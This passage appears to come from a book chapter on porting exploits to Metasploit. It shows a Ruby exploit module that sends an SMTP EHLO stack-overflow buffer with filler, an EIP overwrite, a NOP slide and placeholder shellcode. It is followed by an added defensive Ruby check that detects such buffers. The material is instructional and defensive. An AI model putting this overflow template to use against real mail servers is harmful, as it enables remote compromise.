Porting Exploits to the Metasploit Framework
      ], self.class)
  end

  # Skeleton exploit method: connect, deliver the buffer (sploit is assembled
  # in the next listing), then hand off to the payload handler.
  def exploit
    connect
    sock.put(sploit + "\r\n")
    handler
    disconnect
  end
end
Because this exploit does not require authentication, we need only the Msf::Exploit::Remote::Tcp mixin shown in the listing above. We've discussed mixins in previous chapters; you'll recall that mixins allow you to use built-in protocols such as Remote::Tcp to perform basic remote TCP communications.

In the preceding listing, the target return address is set to the bogus value 0xdeadbeef, and the default TCP port is set to 25. Upon connecting to the target, Metasploit sends the attack buffer using sock.put, handling the connection and delivery for us.
Configuring the Exploit Definition
Let's look at how we initially configure our exploit definition. We will need to feed the service a greeting as required by the protocol, a large buffer, a placeholder where we will take control of EIP, a brief NOP slide, and a placeholder for our shellcode. Here's the code:
  def exploit
    connect
    sploit = "EHLO "             # protocol greeting the service expects
    sploit << "\x41" * 5093      # filler: 5093 "A"s to reach the saved return address
    sploit << "\x42" * 4         # 4 "B"s: placeholder that lands in EIP
    sploit << "\x90" * 32        # short NOP slide
    sploit << "\xcc" * 1000      # dummy shellcode (INT3 breakpoints)
    sock.put(sploit + "\r\n")
    handler
    disconnect
  end
The malicious buffer is built based on the original exploit code, beginning with the EHLO command, followed by a long string of As (5093 of them), 4 bytes to overwrite the EIP register, a small NOP slide, and then some dummy shellcode.
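As an added example (not from the book), here is the defender's counterpart to the buffer assembled above: a Ruby check that flags an SMTP command line whose EHLO/HELO argument is oversized, is not a hostname, or carries long runs of a single byte such as the 0x41 filler and 0x90 NOP slide in the listing. The sample lines are constructed here; the only external fact assumed is RFC 5321's 512-octet limit on a command line.

```ruby
# RFC 5321 caps an SMTP command line at 512 octets including CRLF, and the
# EHLO/HELO argument must be a hostname or a bracketed address literal.
MAX_SMTP_LINE = 512
HOSTNAME_ARG  = /\A[A-Za-z0-9.\-]+\z|\A\[[0-9A-Fa-f.:]+\]\z/

# Inspect one raw SMTP command line (bytes as seen on the wire) and return
# the reasons, if any, for treating it as a probable overflow attempt.
def inspect_smtp_line(raw)
  line = raw.b                  # work on bytes; attack buffers are not valid UTF-8
  findings = []
  if line.bytesize > MAX_SMTP_LINE
    findings << "line is #{line.bytesize} bytes (limit #{MAX_SMTP_LINE})"
  end
  verb, arg = line.chomp("\r\n").split(" ", 2)
  arg = arg.to_s
  if %w[EHLO HELO].include?(verb.to_s.upcase) && !arg.match?(HOSTNAME_ARG)
    findings << "#{verb} argument is not a hostname or address literal"
  end
  # Padding and NOP slides show up as long runs of one repeated byte
  # (0x41 filler, 0x90 NOPs, 0xcc INT3 in the listing above).
  if (run = arg[/(.)\1{31,}/m])
    findings << format("run of %d x 0x%02x bytes", run.bytesize, run.getbyte(0))
  end
  nonprint = arg.count("^ -~")  # bytes outside printable ASCII
  findings << "#{nonprint} non-printable bytes in argument" if nonprint > 0
  findings
end

# Constructed samples: a normal greeting and the buffer the exploit above sends.
BENIGN_EHLO   = "EHLO mail.example.com\r\n"
OVERFLOW_EHLO = "EHLO " + "\x41" * 5093 + "\x42" * 4 + "\x90" * 32 + "\xcc" * 1000 + "\r\n"

if __FILE__ == $0
  [BENIGN_EHLO, OVERFLOW_EHLO].each do |sample|
    result = inspect_smtp_line(sample)
    label  = sample.b[0, 20].inspect
    puts result.empty? ? "OK    #{label}" : "ALERT #{label}: #{result.join('; ')}"
  end
end
```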